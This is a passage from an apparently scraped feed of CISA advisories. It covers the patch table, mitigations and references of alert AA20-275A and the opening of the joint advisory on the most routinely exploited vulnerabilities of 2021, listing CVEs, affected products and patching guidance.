Available](<https://www.mobileiron.com/en/blog/mobileiron-security-updates-available>) \n[CVE-2020-1350](<https://nvd.nist.gov/vuln/detail/CVE-2020-1350>) | \n\n * Windows Server 2008 for 32-bit Systems Service Pack 2\n * Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)\n * Windows Server 2008 for x64-based Systems Service Pack 2\n * Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)\n * Windows Server 2008 R2 for x64-based Systems Service Pack 1\n * Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)\n * Windows Server 2012\n * Windows Server 2012 (Server Core installation)\n * Windows Server 2012 R2\n * Windows Server 2012 R2 (Server Core installation)\n * Windows Server 2016\n * Windows Server 2016 (Server Core installation)\n * Windows Server 2019\n * Windows Server 2019 (Server Core installation)\n * Windows Server, version 1903 (Server Core installation)\n * Windows Server, version 1909 (Server Core installation)\n * Windows Server, version 2004 (Server Core installation)\n| \n\n * [Microsoft Security Advisory for CVE-2020-1350](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1350>) \n \n[CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>) | \n\n * Windows Server 2008 R2 for x64-based Systems Service Pack 1\n * Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)\n * Windows Server 2012\n * Windows Server 2012 (Server Core installation)\n * Windows Server 2012 R2\n * Windows Server 2016\n * Windows Server 2019\n * Windows Server 2019 (Server Core installation)\n * Windows Server, version 1903 (Server Core installation)\n * Windows Server, version 1909 (Server Core installation)\n * Windows Server, version 2004 (Server Core installation)\n| \n\n * [Microsoft Security Advisory for CVE-2020-1472](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>) \n \n[CVE-2020-1040](<https://nvd.nist.gov/vuln/detail/CVE-2020-1040>) | \n\n * Windows Server 2008 R2 for x64-based Systems Service Pack 1\n * Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)\n * Windows Server 2012\n * Windows Server 2012 (Server Core installation)\n * Windows Server 2012 R2\n * Windows Server 2012 R2 (Server Core installation)\n * Windows Server 2016\n * Windows Server 2016 (Server Core installation)\n| \n\n * [Microsoft Security Advisory for CVE-2020-1040](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1040>) \n[CVE-2018-6789](<https://nvd.nist.gov/vuln/detail/CVE-2018-6789>) | \n\n * Exim before 4.90.1\n| \n\n * [Exim page for CVE-2020-6789](<https://exim.org/static/doc/security/CVE-2018-6789.txt>)\n * [Exim patch information for CVE-2020-6789](<https://git.exim.org/exim.git/commit/cf3cd306062a08969c41a1cdd32c6855f1abecf1>) \n[CVE-2020-0688](<https://nvd.nist.gov/vuln/detail/CVE-2020-0688>) | \n\n * Microsoft Exchange Server 2010 Service Pack 3 Update Rollup 30\n * Microsoft Exchange Server 2013 Cumulative Update 23\n * Microsoft Exchange Server 2016 Cumulative Update 14\n * Microsoft Exchange Server 2016 Cumulative Update 15\n * Microsoft Exchange Server 2019 Cumulative Update 3\n * Microsoft Exchange Server 2019 Cumulative Update 4\n| \n\n * [Microsoft Security Advisory for CVE-2020-0688](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688>) \n[CVE-2018-4939](<https://nvd.nist.gov/vuln/detail/CVE-2018-4939>) | \n\n * ColdFusion Update 5 and earlier versions\n * ColdFusion 11 Update 13 and earlier versions\n| \n\n * [Adobe Security Bulletin APSB18-14](<https://helpx.adobe.com/security/products/coldfusion/apsb18-14.html>) \n[CVE-2015-4852](<https://nvd.nist.gov/vuln/detail/CVE-2015-4852>) | \n\n * Oracle WebLogic Server 10.3.6.0, 12.1.2.0, 12.1.3.0, and 12.2.1.0\n| \n\n * [Oracle Critical Patch Update Advisory - October 2016](<https://www.oracle.com/security-alerts/cpuoct2016.html>) \n[CVE-2020-2555](<https://nvd.nist.gov/vuln/detail/CVE-2020-2555>) | \n\n * Oracle Coherence product of Oracle Fusion Middleware Middleware; versions 3.7.1.0, 12.1.3.0.0, 12.2.1.3.0 and 12.2.1.4.0.\n| \n\n * [Oracle Critical Patch Update Advisory - January 2020](<https://www.oracle.com/security-alerts/cpujan2020.html>) \n[CVE-2019-3396](<https://nvd.nist.gov/vuln/detail/CVE-2019-3396>) | \n\n * Atlassian Confluence Server before version 6.6.12, from version 6.7.0 before 6.12.3, from version 6.13.0 before 6.13.3), and from version 6.14.0 before 6.14.2\n| \n\n * [Jira Atlassian Confluence Sever and Data Center: Remote code execution via Widget Connector macro - CVE-2019-3396](<https://jira.atlassian.com/browse/CONFSERVER-57974>) \n[CVE-2019-11580](<https://nvd.nist.gov/vuln/detail/CVE-2019-11580>) | \n\n * Atlassian Crowd and Crowd Data Center from version 2.1.0 before 3.0.5, from version 3.1.0 before 3.1.6, from version 3.2.0 before 3.2.8, from version 3.3.0 before 3.3.5, and from version 3.4.0 before 3.4.4\n| \n\n * [Jira Atlassian Crowd: Crowd - pdkinstall development plugin incorrectly enabled - CVE-2019-11580](<https://jira.atlassian.com/browse/CWD-5388>) \n[CVE-2020-10189](<https://nvd.nist.gov/vuln/detail/CVE-2020-10189>) | \n\n * Zoho ManageEngine Desktop Central before 10.0.474\n| \n\n * [ManageEngine Desktop Central remote code execution vulnerability (CVE-2020-10189)](<https://www.manageengine.com/products/desktop-central/remote-code-execution-vulnerability.html>) \n[CVE-2019-18935](<https://nvd.nist.gov/vuln/detail/CVE-2019-18935>) | \n\n * Progress Telerik UI for ASP.NET AJAX through 2019.3.1023\n| \n\n * [Telerik: ASP.NET AJAX: Allows JavaScriptSerializer Deserialization](<https://www.telerik.com/support/kb/aspnet-ajax/details/allows-javascriptserializer-deserialization>) \n[CVE-2020-0601](<https://nvd.nist.gov/vuln/detail/CVE-2020-0601>) | \n\n * Windows 10 for 32-bit Systems\n * Windows 10 for x64-based Systems\n * Windows 10 Version 1607 for 32-bit Systems\n * Windows 10 Version 1607 for x64-based Systems\n * Windows 10 Version 1709 for 32-bit Systems\n * Windows 10 Version 1709 for ARM64-based Systems\n * Windows 10 Version 1709 for x64-based Systems\n * Windows 10 Version 1803 for 32-bit Systems\n * Windows 10 Version 1803 for ARM64-based Systems\n * Windows 10 Version 1803 for x64-based Systems\n * Windows 10 Version 1809 for 32-bit Systems\n * Windows 10 Version 1809 for ARM64-based Systems\n * Windows 10 Version 1809 for x64-based Systems\n * Windows 10 Version 1903 for 32-bit Systems\n * Windows 10 Version 1903 for ARM64-based Systems\n * Windows 10 Version 1903 for x64-based Systems\n * Windows 10 Version 1909 for 32-bit Systems\n * Windows 10 Version 1909 for ARM64-based Systems\n * Windows 10 Version 1909 for x64-based Systems\n * Windows Server 2016\n * Windows Server 2016 (Server Core installation)\n * Windows Server 2019\n * Windows Server 2019 (Server Core installation)\n * Windows Server, version 1803 (Server Core Installation)\n * Windows Server, version 1903 (Server Core installation)\n * Windows Server, version 1909 (Server Core installation)\n| \n\n * [Microsoft Security Advisory for CVE-2020-0601](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0601>) \n[CVE-2019-0803](<https://nvd.nist.gov/vuln/detail/CVE-2019-0803>) | \n\n * Windows 10 for 32-bit Systems\n * Windows 10 for x64-based Systems\n * Windows 10 Version 1607 for 32-bit Systems\n * Windows 10 Version 1607 for x64-based Systems\n * Windows 10 Version 1703 for 32-bit Systems\n * Windows 10 Version 1703 for x64-based Systems\n * Windows 10 Version 1709 for 32-bit Systems\n * Windows 10 Version 1709 for ARM64-based Systems\n * Windows 10 Version 1709 for x64-based Systems\n * Windows 10 Version 1803 for 32-bit Systems\n * Windows 10 Version 1803 for ARM64-based Systems\n * Windows 10 Version 1803 for x64-based Systems\n * Windows 10 Version 1809 for 32-bit Systems\n * Windows 10 Version 1809 for ARM64-based Systems\n * Windows 10 Version 1809 for x64-based Systems\n * Windows 7 for 32-bit Systems Service Pack 1\n * Windows 7 for x64-based Systems Service Pack 1\n * Windows 8.1 for 32-bit systems\n * Windows 8.1 for x64-based systems\n * Windows RT 8.1\n * Windows Server 2008 for 32-bit Systems Service Pack 2\n * Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)\n * Windows Server 2008 for Itanium-Based Systems Service Pack 2\n * Windows Server 2008 for x64-based Systems Service Pack\n * Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)\n * Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1\n * Windows Server 2008 R2 for x64-based Systems Service Pack 1\n * Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)\n * Windows Server 2012\n * Windows Server 2012 (Server Core installation)\n * Windows Server 2012 R2\n * Windows Server 2012 R2 (Server Core installation)\n * Windows Server 2016\n * Windows Server 2016 (Server Core installation)\n * Windows Server 2019\n * Windows Server 2019 (Server Core installation)\n * Windows Server, version 1803 (Server Core Installation)\n| \n\n * [Microsoft Security Advisory for CVE-2019-0803](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0803>) \n \n[CVE-2017-6327](<https://nvd.nist.gov/vuln/detail/CVE-2017-6327>) | \n\n * Symantec Messaging Gateway before 10.6.3-267\n| \n\n * [Broadcom Security Updates Detial for CVE-2017-6327 and CVE-2017-6328 ](<https://www.broadcom.com/support/security-center/securityupdates/detail?fid=security_advisory&pvid=security_advisory&year=&suid=20170810_00>) \n[CVE-2020-3118](<https://nvd.nist.gov/vuln/detail/CVE-2020-3118>) | \n\n * ASR 9000 Series Aggregation Services Routers\n * Carrier Routing System (CRS)\n * IOS XRv 9000 Router\n * Network Convergence System (NCS) 540 Series Routers\n * NCS 560 Series Routers\n * NCS 1000 Series Routers\n * NCS 5000 Series Routers\n * NCS 5500 Series Routers\n * NCS 6000 Series Routers\n| \n\n * [Cisco Security Advisory cisco-sa-20200205-iosxr-cdp-rce](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20200205-iosxr-cdp-rce>) \n[CVE-2020-8515](<https://nvd.nist.gov/vuln/detail/CVE-2020-8515>) | \n\n * DrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta, and Vigor300B 1.3.3_Beta, 1.4.2.1_Beta, and 1.4.4_Beta devices\n| \n\n * [Draytek Security Advisory: Vigor3900 / Vigor2960 / Vigor300B Router Web Management Page Vulnerability (CVE-2020-8515)](<https://www.draytek.com/about/security-advisory/vigor3900-/-vigor2960-/-vigor300b-router-web-management-page-vulnerability-\$cve-2020-8515\$/>) \n \n 2. **Implement rigorous configuration management programs. **Audit configuration management programs to ensure they can track and mitigate emerging threats. Review system configurations for misconfigurations and security weaknesses. Implementing a robust configuration and patch management program hinders sophisticated APT operations by limiting the effectiveness of opportunistic attacks. \n\n 3. **Disable unnecessary ports, protocols, and services.** Review network security device logs and determine whether to shut off unnecessary ports and protocols. Monitor common ports and protocols for C2 activity. Turn off or disable any unnecessary services or functionality within devices (e.g., universal plug and play [UPnP], PowerShell). \n\n 4. **Enhance monitoring of network and email traffic.** Review network signatures and indicators for focused operations activities, monitor for new phishing themes, and adjust email rules accordingly. Follow best practices of restricting attachments via email. Ensure that log information is aggregated and correlated to enable maximum detection capabilities, with a focus on monitoring for account misuse. \n\n 5. **Use protection capabilities to stop malicious activity.** Implement antivirus software and other endpoint protection capabilities to automatically detect and prevent malicious files from executing. Use network intrusion detection and prevention systems to identify and prevent commonly employed adversarial malware and limit nefarious data transfers.\n\n### Contact Information\n\nCISA encourages recipients of this report to contribute any additional information that they may have related to this threat. For any questions related to this report, please contact CISA at:\n\n * 1-888-282-0870 (From outside the United States: +1-703-235-8832)\n * [Central@cisa.dhs.gov](<mailto:Central@cisa.dhs.gov>) (UNCLASS)\n\nCISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on the CISA homepage at <http://www.us-cert.cisa.gov/>.\n\n### References\n\n[[1] White House Publication: How China\u2019s Economic Aggression Threatens the Technologies and Intellectual Property of the United States and the World ](<https://www.whitehouse.gov/wp-content/uploads/2018/06/FINAL-China-Technology-Report-6.18.18-PDF.pdf>)\n\n[[2] Congressional Research Services: 'Made in China 2025' Industrial Policies: Issues for Congress ](<https://fas.org/sgp/crs/row/IF10964.pdf>)\n\n[[3] Council on Foreign Relations: Is \u2018Made in China 2025\u2019 a Threat to Global Trade ](<https://www.cfr.org/backgrounder/made-china-2025-threat-global-trade>)\n\n[[4] Mandiant: APT1 Exposing One of China\u2019s Cyber Espionage Units ](<https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf>)\n\n[[5] U.S. Department of Justice (DOJ) Press Release: U.S. Charges Five Chinese Military Hackers for Cyber Espionage Against U.S. Corporations and a Labor Organization for Commercial Advantage](<https://www.justice.gov/opa/pr/us-charges-five-chinese-military-hackers-cyber-espionage-against-us-corporations-and-labor>)\n\n[[6] CISA Alert TA17-117A: Intrusions Affecting Multiple Victims Across Multiple Sectors](<https://us-cert.cisa.gov/ncas/alerts/TA17-117A>)\n\n[[7] DOJ Press Release: Deputy Attorney General Rod J. Rodenstein Announces Charges Against Chinese Hackers](<https://www.justice.gov/opa/speech/deputy-attorney-general-rod-j-rosenstein-announces-charges-against-chinese-hackers>)\n\n[[8] CISA Awareness Briefing: Chinese Cyber Activity Targeting Managed Service Providers](<https://us-cert.cisa.gov/sites/default/files/publications/Chinese-Cyber-Activity-Targeting-Managed-Service-Providers.pdf>)\n\n[[9] DOJ Press Release: Deputy Attorney General William P. Barr Announces Indictment of Four Members of China\u2019s Military for Hacking into Equifax](<https://www.justice.gov/opa/speech/attorney-general-william-p-barr-announces-indictment-four-members-china-s-military>)\n\n[[10] CISA Press Release: FBI and CISA Warn Against Chinese Targeting of COVID-19 Research Organizations ](<https://www.cisa.gov/news/2020/05/13/fbi-and-cisa-warn-against-chinese-targeting-covid-19-research-organizations>)\n\n[[11] CISA Alert AA20-126A: APT Groups Target Healthcare and Essential Services](<https://us-cert.cisa.gov/ncas/alerts/AA20126A>)\n\n[[12] CISA Current Activity (CA): Chinese Malicious Cyber Activity](<https://us-cert.cisa.gov/ncas/current-activity/2020/08/03/chinese-malicious-cyber-activity>)\n\n[[13] FireEye Advanced Persistent Threat Groups](<https://www.fireeye.com/current-threats/apt-groups.html>)\n\n[[14] MITRE ATT&CK: APT3](<https://attack.mitre.org/groups/G0022/>)\n\n[[15] MITRE ATT&CK: APT19](<https://attack.mitre.org/groups/G0073/>)\n\n[[16] MITRE ATT&CK: APT41](<https://attack.mitre.org/groups/G0096/>)\n\n[[17] CISA Alert AA20-133A: Top 10 Routinely Exploited Vulnerabilities](<https://us-cert.cisa.gov/ncas/alerts/aa20-133a>)\n\n[[18] CISA Alert AA20-020A: Critical Vulnerability in Citrix Application Delivery Controller, Gateway, and SD-WAN WANOP](<https://us-cert.cisa.gov/ncas/alerts/aa20-020a>)\n\n[[19] CISA CA: F5 Releases Security Advisory for BIP-IP TMUI RCE Vulnerability, CVE-2020-5902](<https://us-cert.cisa.gov/ncas/current-activity/2020/07/04/f5-releases-security-advisory-big-ip-tmui-rce-vulnerability-cve>)\n\n[[20] CISA Alert AA20-133A: Top 10 Routinely Exploited Vulnerabilities](<https://us-cert.cisa.gov/ncas/alerts/aa20-133a>)\n\n[[21] NSA Advisory: Chinese State-Sponsored Actors Exploit Publicly Known Vulnerabilities](<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>)\n\n### Revisions\n\nOctober 1, 2020: Initial Version|October 20, 2020: Recommended Actions Section Updated\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-10-20T12:00:00", "type": "ics", "title": "Potential for China Cyber Response to Heightened U.S.\u2013China Tensions", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0158", "CVE-2015-4852", "CVE-2017-6327", "CVE-2017-6328", "CVE-2018-4939", "CVE-2018-6789", "CVE-2019-0708", "CVE-2019-0803", "CVE-2019-11510", "CVE-2019-11580", "CVE-2019-16278", "CVE-2019-1652", "CVE-2019-1653", "CVE-2019-16920", "CVE-2019-18935", "CVE-2019-19781", "CVE-2019-3396", "CVE-2020-0601", "CVE-2020-0688", "CVE-2020-10189", "CVE-2020-1040", "CVE-2020-1350", "CVE-2020-1472", "CVE-2020-15505", "CVE-2020-2555", "CVE-2020-3118", "CVE-2020-5902", "CVE-2020-6789", "CVE-2020-8193", "CVE-2020-8195", "CVE-2020-8196", "CVE-2020-8515", "CVE-2022-42475", "CVE-2022-47966"], "modified": "2020-10-20T12:00:00", "id": "AA20-275A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-275a", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-09-23T06:47:11", "description": "### Summary\n\nThis joint Cybersecurity Advisory (CSA) was coauthored by cybersecurity authorities of the United States, Australia, Canada, New Zealand, and the United Kingdom: the Cybersecurity and Infrastructure Security Agency ([CISA](<https://www.cisa.gov/>)), National Security Agency ([NSA](<https://www.nsa.gov/Cybersecurity/>)), Federal Bureau of Investigation ([FBI](<https://www.fbi.gov/investigate/cyber>)), Australian Cyber Security Centre ([ACSC](<https://www.cyber.gov.au/>)), Canadian Centre for Cyber Security ([CCCS](<https://www.cyber.gc.ca/en/>)), New Zealand National Cyber Security Centre ([NZ NCSC](<https://www.gcsb.govt.nz/>)), and United Kingdom\u2019s National Cyber Security Centre ([NCSC-UK](<https://www.ncsc.gov.uk/>)). This advisory provides details on the top 15 Common Vulnerabilities and Exposures (CVEs) routinely exploited by malicious cyber actors in 2021, as well as other CVEs frequently exploited.\n\nU.S., Australian, Canadian, New Zealand, and UK cybersecurity authorities assess, in 2021, malicious cyber actors aggressively targeted newly disclosed critical software vulnerabilities against broad target sets, including public and private sector organizations worldwide. To a lesser extent, malicious cyber actors continued to exploit publicly known, dated software vulnerabilities across a broad spectrum of targets. \n\nThe cybersecurity authorities encourage organizations to apply the recommendations in the Mitigations section of this CSA. These mitigations include applying timely patches to systems and implementing a centralized patch management system to reduce the risk of compromise by malicious cyber actors.\n\nDownload the Joint Cybersecurity Advisory: 2021 top Routinely Exploited Vulnerabilities (pdf, 777kb).\n\n### Technical Details\n\n#### **Key Findings**\n\nGlobally, in 2021, malicious cyber actors targeted internet-facing systems, such as email servers and virtual private network (VPN) servers, with exploits of newly disclosed vulnerabilities. For most of the top exploited vulnerabilities, researchers or other actors released proof of concept (POC) code within two weeks of the vulnerability\u2019s disclosure, likely facilitating exploitation by a broader range of malicious actors.\n\nTo a lesser extent, malicious cyber actors continued to exploit publicly known, dated software vulnerabilities\u2014some of which were also [routinely exploited in 2020](<https://www.cisa.gov/uscert/ncas/alerts/aa21-209a>) or earlier. The exploitation of older vulnerabilities demonstrates the continued risk to organizations that fail to patch software in a timely manner or are using software that is no longer supported by a vendor.\n\n#### **Top 15 Routinely Exploited Vulnerabilities**\n\nTable 1 shows the top 15 vulnerabilities U.S., Australian, Canadian, New Zealand, and UK cybersecurity authorities observed malicious actors routinely exploiting in 2021, which include:\n\n * **CVE-2021-44228.** This vulnerability, known as Log4Shell, affects Apache\u2019s Log4j library, an open-source logging framework. An actor can exploit this vulnerability by submitting a specially crafted request to a vulnerable system that causes that system to execute arbitrary code. The request allows a cyber actor to take full control over the system. The actor can then steal information, launch ransomware, or conduct other malicious activity.[1] Log4j is incorporated into thousands of products worldwide. This vulnerability was disclosed in December 2021; the rapid widespread exploitation of this vulnerability demonstrates the ability of malicious actors to quickly weaponize known vulnerabilities and target organizations before they patch.\n * **CVE-2021-26855, CVE-2021-26858, CVE-2021-26857, CVE-2021-27065.** These vulnerabilities, known as ProxyLogon, affect Microsoft Exchange email servers. Successful exploitation of these vulnerabilities in combination (i.e., \u201cvulnerability chaining\u201d) allows an unauthenticated cyber actor to execute arbitrary code on vulnerable Exchange Servers, which, in turn, enables the actor to gain persistent access to files and mailboxes on the servers, as well as to credentials stored on the servers. Successful exploitation may additionally enable the cyber actor to compromise trust and identity in a vulnerable network.\n * **CVE-2021-34523, CVE-2021-34473, CVE-2021-31207.** These vulnerabilities, known as ProxyShell, also affect Microsoft Exchange email servers. Successful exploitation of these vulnerabilities in combination enables a remote actor to execute arbitrary code. These vulnerabilities reside within the Microsoft Client Access Service (CAS), which typically runs on port 443 in Microsoft Internet Information Services (IIS) (e.g., Microsoft\u2019s web server). CAS is commonly exposed to the internet to enable users to access their email via mobile devices and web browsers. \n * **CVE-2021-26084.** This vulnerability, affecting Atlassian Confluence Server and Data Center, could enable an unauthenticated actor to execute arbitrary code on vulnerable systems. This vulnerability quickly became one of the most routinely exploited vulnerabilities after a POC was released within a week of its disclosure. Attempted mass exploitation of this vulnerability was observed in September 2021.\n\nThree of the top 15 routinely exploited vulnerabilities were also [routinely exploited in 2020](<https://www.cisa.gov/uscert/ncas/alerts/aa21-209a>): CVE-2020-1472, CVE-2018-13379, and CVE-2019-11510. Their continued exploitation indicates that many organizations fail to patch software in a timely manner and remain vulnerable to malicious cyber actors.\n\n_Table 1: Top 15 Routinely Exploited Vulnerabilities in 2021_\n\nCVE\n\n| \n\nVulnerability Name\n\n| \n\nVendor and Product\n\n| \n\nType \n \n---|---|---|--- \n \n[CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>)\n\n| \n\nLog4Shell\n\n| \n\nApache Log4j\n\n| \n\nRemote code execution (RCE) \n \n[CVE-2021-40539](<https://nvd.nist.gov/vuln/detail/CVE-2021-40539>)\n\n| \n\n| \n\nZoho ManageEngine AD SelfService Plus\n\n| \n\nRCE \n \n[CVE-2021-34523](<https://nvd.nist.gov/vuln/detail/CVE-2021-34523>)\n\n| \n\nProxyShell\n\n| \n\nMicrosoft Exchange Server\n\n| \n\nElevation of privilege \n \n[CVE-2021-34473](<https://nvd.nist.gov/vuln/detail/CVE-2021-34473>)\n\n| \n\nProxyShell\n\n| \n\nMicrosoft Exchange Server\n\n| \n\nRCE \n \n[CVE-2021-31207](<https://nvd.nist.gov/vuln/detail/CVE-2021-31207>)\n\n| \n\nProxyShell\n\n| \n\nMicrosoft Exchange Server\n\n| \n\nSecurity feature bypass \n \n[CVE-2021-27065](<https://nvd.nist.gov/vuln/detail/CVE-2021-27065>)\n\n| \n\nProxyLogon\n\n| \n\nMicrosoft Exchange Server\n\n| \n\nRCE \n \n[CVE-2021-26858](<https://nvd.nist.gov/vuln/detail/CVE-2021-26858>)\n\n| \n\nProxyLogon\n\n| \n\nMicrosoft Exchange Server\n\n| \n\nRCE \n \n[CVE-2021-26857](<https://nvd.nist.gov/vuln/detail/CVE-2021-26857>)\n\n| \n\nProxyLogon\n\n| \n\nMicrosoft Exchange Server\n\n| \n\nRCE \n \n[CVE-2021-26855](<https://nvd.nist.gov/vuln/detail/CVE-2021-26855>)\n\n| \n\nProxyLogon\n\n| \n\nMicrosoft Exchange Server\n\n| \n\nRCE \n \n[CVE-2021-26084](<https://nvd.nist.gov/vuln/detail/CVE-2021-26084>)\n\n| \n\n| \n\nAtlassian Confluence Server and Data Center\n\n| \n\nArbitrary code execution \n \n[CVE-2021-21972](<https://nvd.nist.gov/vuln/detail/CVE-2021-21972>)\n\n| \n\n| \n\nVMware vSphere Client\n\n| \n\nRCE \n \n[CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>)\n\n| \n\nZeroLogon\n\n| \n\nMicrosoft Netlogon Remote Protocol (MS-NRPC)\n\n| \n\nElevation of privilege \n \n[CVE-2020-0688](<https://nvd.nist.gov/vuln/detail/CVE-2020-0688>)\n\n| \n\n| \n\nMicrosoft Exchange Server\n\n| \n\nRCE \n \n[CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>)\n\n| \n\n| \n\nPulse Secure Pulse Connect Secure\n\n| \n\nArbitrary file reading \n \n[CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>)\n\n| \n\n| \n\nFortinet FortiOS and FortiProxy\n\n| \n\nPath traversal \n \n#### **Additional Routinely Exploited Vulnerabilities**\n\nIn addition to the 15 vulnerabilities listed in table 1, U.S., Australian, Canadian, New Zealand, and UK cybersecurity authorities identified vulnerabilities, listed in table 2, that were also routinely exploited by malicious cyber actors in 2021. \n\nThese vulnerabilities include multiple vulnerabilities affecting internet-facing systems, including Accellion File Transfer Appliance (FTA), Windows Print Spooler, and Pulse Secure Pulse Connect Secure. Three of these vulnerabilities were also [routinely exploited in 2020](<https://www.cisa.gov/uscert/ncas/alerts/aa21-209a>): CVE-2019-19781, CVE-2019-18935, and CVE-2017-11882.\n\n_Table 2: Additional Routinely Exploited Vulnerabilities in 2021_\n\nCVE\n\n| \n\nVendor and Product\n\n| \n\nType \n \n---|---|--- \n \n[CVE-2021-42237](<https://nvd.nist.gov/vuln/detail/CVE-2021-42237>)\n\n| \n\nSitecore XP\n\n| \n\nRCE \n \n[CVE-2021-35464](<https://nvd.nist.gov/vuln/detail/CVE-2021-35464>)\n\n| \n\nForgeRock OpenAM server\n\n| \n\nRCE \n \n[CVE-2021-27104](<https://nvd.nist.gov/vuln/detail/CVE-2021-27104>)\n\n| \n\nAccellion FTA\n\n| \n\nOS command execution \n \n[CVE-2021-27103](<https://nvd.nist.gov/vuln/detail/CVE-2021-27103>)\n\n| \n\nAccellion FTA\n\n| \n\nServer-side request forgery \n \n[CVE-2021-27102](<https://nvd.nist.gov/vuln/detail/CVE-2021-27102>)\n\n| \n\nAccellion FTA\n\n| \n\nOS command execution \n \n[CVE-2021-27101](<https://nvd.nist.gov/vuln/detail/CVE-2021-27101>)\n\n| \n\nAccellion FTA\n\n| \n\nSQL injection \n \n[CVE-2021-21985](<https://nvd.nist.gov/vuln/detail/CVE-2021-21985>)\n\n| \n\nVMware vCenter Server\n\n| \n\nRCE \n \n[CVE-2021-20038](<https://nvd.nist.gov/vuln/detail/CVE-2021-20038>)\n\n| \n\nSonicWall Secure Mobile Access (SMA)\n\n| \n\nRCE \n \n[CVE-2021-40444](<https://nvd.nist.gov/vuln/detail/CVE-2021-40444>)\n\n| \n\nMicrosoft MSHTML\n\n| \n\nRCE \n \n[CVE-2021-34527](<https://nvd.nist.gov/vuln/detail/CVE-2021-34527>)\n\n| \n\nMicrosoft Windows Print Spooler\n\n| \n\nRCE \n \n[CVE-2021-3156](<https://nvd.nist.gov/vuln/detail/CVE-2021-3156>)\n\n| \n\nSudo\n\n| \n\nPrivilege escalation \n \n[CVE-2021-27852](<https://nvd.nist.gov/vuln/detail/CVE-2021-27852>)\n\n| \n\nCheckbox Survey\n\n| \n\nRemote arbitrary code execution \n \n[CVE-2021-22893](<https://nvd.nist.gov/vuln/detail/CVE-2021-22893>)\n\n| \n\nPulse Secure Pulse Connect Secure\n\n| \n\nRemote arbitrary code execution \n \n[CVE-2021-20016](<https://nvd.nist.gov/vuln/detail/CVE-2021-20016>)\n\n| \n\nSonicWall SSLVPN SMA100\n\n| \n\nImproper SQL command neutralization, allowing for credential access \n \n[CVE-2021-1675](<https://nvd.nist.gov/vuln/detail/CVE-2021-1675>)\n\n| \n\nWindows Print Spooler\n\n| \n\nRCE \n \n[CVE-2020-2509](<https://nvd.nist.gov/vuln/detail/CVE-2020-2509>)\n\n| \n\nQNAP QTS and QuTS hero\n\n| \n\nRemote arbitrary code execution \n \n[CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>)\n\n| \n\nCitrix Application Delivery Controller (ADC) and Gateway\n\n| \n\nArbitrary code execution \n \n[CVE-2019-18935](<https://nvd.nist.gov/vuln/detail/CVE-2019-18935>)\n\n| \n\nProgress Telerik UI for ASP.NET AJAX\n\n| \n\nCode execution \n \n[CVE-2018-0171](<https://nvd.nist.gov/vuln/detail/CVE-2018-0171>)\n\n| \n\nCisco IOS Software and IOS XE Software\n\n| \n\nRemote arbitrary code execution \n \n[CVE-2017-11882](<https://nvd.nist.gov/vuln/detail/CVE-2017-11882>)\n\n| \n\nMicrosoft Office\n\n| \n\nRCE \n \n[CVE-2017-0199](<https://nvd.nist.gov/vuln/detail/CVE-2017-0199>)\n\n| \n\nMicrosoft Office\n\n| \n\nRCE \n \n### Mitigations\n\n#### **Vulnerability and Configuration Management**\n\n * Update software, operating systems, applications, and firmware on IT network assets in a timely manner. Prioritize patching [known exploited vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>), especially those CVEs identified in this CSA, and then critical and high vulnerabilities that allow for remote code execution or denial-of-service on internet-facing equipment. For patch information on CVEs identified in this CSA, refer to the appendix. \n * If a patch for a known exploited or critical vulnerability cannot be quickly applied, implement vendor-approved workarounds.\n * Use a centralized patch management system.\n * Replace end-of-life software, i.e., software that is no longer supported by the vendor. For example, Accellion FTA was 